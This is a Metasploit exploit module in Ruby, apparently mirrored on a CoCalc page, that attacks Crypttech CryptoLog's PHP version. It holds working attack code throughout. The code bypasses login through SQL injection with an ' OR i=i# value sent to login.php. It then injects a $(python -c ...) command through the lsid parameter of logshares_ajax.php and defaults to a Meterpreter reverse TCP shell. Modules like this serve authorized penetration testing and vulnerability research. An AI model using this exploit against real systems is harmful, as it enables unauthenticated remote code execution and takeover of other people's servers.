Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => "Crypttech CryptoLog Remote Code Execution",
16
'Description' => %q{
17
This module exploits a SQL injection and command injection vulnerability in the PHP version of CryptoLog.
18
An unauthenticated user can execute a terminal command under the context of the web user. These vulnerabilities
19
are no longer present in the ASP.NET version CryptoLog, available since 2009.
20
21
CryptoLog's login.php endpoint is responsible for the login process. One of the user supplied parameters is
22
used by the application without input validation and parameter binding, which leads to SQL injection
23
vulnerability. Successfully exploiting this vulnerability gives a valid session.
24
25
CryptoLog's logshares_ajax.php endpoint is responsible for executing an operation system command. It's not
26
possible to access this endpoint without having a valid session. One user parameter is used by the
27
application while executing an operating system command, which causes a command injection issue.
28
29
Combining these vulnerabilities gives the opportunity execute operation system commands under the context
30
of the web user.
31
},
32
'License' => MSF_LICENSE,
33
'Author' => [
34
'Mehmet Ince <[email protected]>' # author & msf module
35
],
36
'References' => [
37
['URL', 'https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/']
38
],
39
'DefaultOptions' => {
40
'Payload' => 'python/meterpreter/reverse_tcp'
41
},
42
'Platform' => ['python'],
43
'Arch' => ARCH_PYTHON,
44
'Targets' => [[ 'Automatic', {}]],
45
'Privileged' => false,
46
'DisclosureDate' => '2017-05-03',
47
'DefaultTarget' => 0,
48
'Notes' => {
49
'Reliability' => UNKNOWN_RELIABILITY,
50
'Stability' => UNKNOWN_STABILITY,
51
'SideEffects' => UNKNOWN_SIDE_EFFECTS
52
}
53
)
54
)
55
56
register_options(
57
[
58
Opt::RPORT(80),
59
OptString.new('TARGETURI', [true, 'The URI of the vulnerable CryptoLog instance', '/'])
60
]
61
)
62
end
63
64
def bypass_login
65
r = rand_text_alpha(15)
66
i = rand_text_numeric(5)
67
68
res = send_request_cgi({
69
'method' => 'POST',
70
'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
71
'vars_get' => {
72
'act' => 'login'
73
},
74
'vars_post' => {
75
'user' => "' OR #{i}=#{i}#",
76
'pass' => "#{r}"
77
}
78
})
79
80
if res && res.code == 302 && res.headers.include?('Set-Cookie')
81
res.get_cookies
82
else
83
nil
84
end
85
end
86
87
def check
88
if bypass_login.nil?
89
Exploit::CheckCode::Safe
90
else
91
Exploit::CheckCode::Appears
92
end
93
end
94
95
def exploit
96
print_status("Bypassing login by exploiting SQLi flaw")
97
98
cookie = bypass_login
99
100
if cookie.nil?
101
fail_with(Failure::Unknown, "Something went wrong.")
102
end
103
104
print_good("Successfully logged in")
105
106
print_status("Exploiting command injection flaw")
107
r = rand_text_alpha(15)
108
109
send_request_cgi({
110
'method' => 'POST',
111
'uri' => normalize_uri(target_uri.path, 'cryptolog', 'logshares_ajax.php'),
112
'cookie' => cookie,
113
'vars_post' => {
114
'opt' => "check",
115
'lsid' => "$(python -c \"#{payload.encoded}\")",
116
'lssharetype' => "#{r}"
117
}
118
})
119
end
120
end
121
122